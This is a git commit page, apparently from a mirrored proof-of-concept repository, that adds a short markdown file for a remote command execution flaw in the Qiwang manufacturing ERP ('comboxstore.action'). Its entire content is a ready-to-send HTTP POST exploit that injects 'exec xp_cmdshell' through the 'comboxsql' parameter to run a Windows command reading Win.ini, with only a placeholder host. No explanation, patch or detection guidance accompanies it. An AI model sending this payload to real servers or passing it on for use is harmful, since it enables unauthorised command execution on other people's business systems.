mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-02 17:25:35 +08:00
Create 企望制造 ERP comboxstore.action 远程命令执行漏洞.md
This commit is contained in:
9
企望制造 ERP comboxstore.action 远程命令执行漏洞.md
Normal file
9
企望制造 ERP comboxstore.action 远程命令执行漏洞.md
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
## 企望制造 ERP comboxstore.action 远程命令执行漏洞
|
||||||
|
```
|
||||||
|
|
||||||
|
POST /mainFunctions/comboxstore.action HTTP/1.1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Host: xxx.xxx.xxx.xxx
|
||||||
|
|
||||||
|
comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
|
||||||
|
```
|
||||||
Reference in New Issue
Block a user